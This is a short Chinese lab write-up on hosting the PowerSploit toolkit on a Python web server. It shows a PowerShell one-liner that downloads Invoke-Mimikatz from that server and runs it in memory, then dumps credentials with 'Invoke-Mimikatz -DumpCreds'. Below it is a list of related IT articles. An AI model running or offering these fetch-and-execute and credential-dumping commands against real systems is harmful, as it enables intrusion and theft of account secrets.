powershell脚本站点的搭建

原創 芷若。 2020-06-24 20:20

实验材料
服务器:win7
客户端:windows server 2008
实验环境:
在服务端搭建powershell脚本站点,在客户端连接服务端的脚本,并执行命令
客户端有python环境,客户端与服务端有连接
实验步骤:

  1. 从https://github.com/PowerShellMafia/PowerSploit下载脚本
  2. 在win7上安装python环境
  3. 开启python的web服务(利用python搭建一个站点) 进入到PowerSploit-master目录里面python -m http.server 80
    #python3.7在这里插入图片描述
  4. 测试web服务
    在这里插入图片描述
  5. 在客户端加载服务端脚本并执行

powershell加载iex(New-Object Net.WebClient).DownloadString(‘http://192.168.131.129/Exfiltration/Invoke-Mimikatz.ps1’)
在这里插入图片描述
执行: Invoke-Mimikatz -DumpCreds

效果图如下:

在这里插入图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

WIN10 开通Administrator超级管理员

文|Seraph 打開控制面板中的管理工具-計算機管理-本地用戶和組-用戶,雙擊Administrator用戶,去掉賬戶已禁用。 打開管理工具中的本地安全策略-本地策略-安全選項,雙擊用戶控制:用於內置管理員賬戶的管理員

ME_Seraph 2020-07-08 00:56:51

bat 脚本修改httpd.conf php环境 文件

  @echo off rem 強制獲取管理員權限 %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","",

tjjingpan 2020-07-06 03:43:31

Windows系统介绍

Windows常見目錄 用戶 這裏存儲量用戶的設置,包括用戶文檔、上網瀏覽信息、配置文件等數據。 windows 用來放置windows程序的使用數據、設置等文件。強烈不建議改動此文件下的數據,可能會導致windows系統使用異

史蒂芬飞 2020-07-03 10:54:08

windows常用的网络排查命令

ping 通過發送ICMP驗證與其他TCP/IP計算機的IP級連接回顯請求消息。顯示相應的迴音回覆信息的接收,以及往返時間。 用於解決連接、可訪問性和名稱解析問題 常用ping選項: -t—一直ping,直到按下Ctrl+c -

史蒂芬飞 2020-07-03 10:54:08

DB2/SQL命令大全

DB2/SQL命令大全 一、常用命令 1. 建立數據庫DB2_GCB CREATE DATABASE DB2_GCB ON G:ALIAS DB2_GCB USING CODESET GBK TERRITORY CNCOLLATE

chmo2011 2020-07-01 04:41:36

ubuntu下apache+tomcat+jk配置负载均衡

ubuntu下apache+tomcat+jk配置負載均衡   環境: Ubuntu10.04 apache 2.2.24 tomcat 6.0.260 mod_jk mod_jk/1.2.26 負載均衡(Load Balance):

chmo2011 2020-07-01 04:41:36

logratate管理tomcat的catalina.out

logratate管理tomcat的catalina.out 服務器上的tomcat的catalina.out文件越來越大,查看起來很不方便, 以前每次都是想起來的時候手工清理一下(cat /dev/null > catalina

chmo2011 2020-07-01 04:41:36

Dell 笔记本重装系统后恢复出厂,纯文字简述方法。

條件: 那個10G左右的隱藏分區必須要在,最好不要損壞。(查看方法:自行百度) 工具:DGFree (工具百度有) , imagex (百度有),u盤pe (我用的是大白菜) 注:出廠預裝win8系統是uefi+gpt的,所以普通的那種p

一只菜鸟..... 2020-06-29 14:39:13

windows系统EFI分区变主分区修复方法。

win8以上系統現在基本都是uefi+gpt的方式了,但是這個EFI分區本身有可能會變成主分區,這樣的話系統就無法識別了,因此一般出廠預裝的win8,win10系統也就會出現一系列的問題,比如無法快速啓動,打開快速啓動無法正常關機,無法調

一只菜鸟..... 2020-06-29 14:38:57

进程的各种内存

參考: 【1】https://blog.csdn.net/fw0124/article/details/6367360?utm_medium=distribute.pc_relevant.none-task-blog-baiduj

一叶清风扬 2020-06-28 11:01:20

开始-运行命令大全

 winver---------檢查Windows版本 wmimgmt.msc----打開windows管理體系結構(WMI)  wupdmgr--------windows更新程序 wscript--------windows腳本宿

mylinx 2020-06-26 15:36:28

windows10安装.net framework3.5

說明:本次安裝不需要任何下載程序, 1、需要確定windows updata服務已打開 2、打開控制面板->程序->程序和功能   然後點擊"啓用或關閉windows功能" 3、打開後如下圖,有一個選項: .NET Framework

表演系小学渣 2020-06-26 10:04:11

远程桌面用户的创建、锁定与解封

實驗環境:Windows7,物理機。 在window7上打開cmd建立新帳戶 在win7上打開控制面板選擇管理工具,單擊本地安全策略中賬戶策略。 3. 在單擊賬戶鎖定閾值,設置閾值爲3. 4. 將test1用戶添

芷若。 2020-06-24 20:20:16

“在地址栏中显示完整路径”和“隐藏已知文件类型的扩展名”

第一: 有時候需要查看文件的完整路徑,但地址欄中只是顯示當前文件夾的名字,設置方法如下: 工具-->文件夾選項-->查看(標籤)-->高級設置裏有“在地址欄中顯示完整路徑”選項,選中此選項,確定即可。截圖如下: 第二:  

lishiyuzuji 2020-06-24 11:27:59

ip和mac地址绑定,修改mac地址

    有些公司爲了規範員工上網,防止隨意的更改ip,導致網絡混亂,將ip和mac地址進行了綁定。也就是說,即使ip地址dns等都寫對了,但是還是不能上網,因爲你的實際地址(就是mac地址沒有改變),當你想使用自己的筆記本在公司上網怎麼解

lishiyuzuji 2020-06-24 11:27:44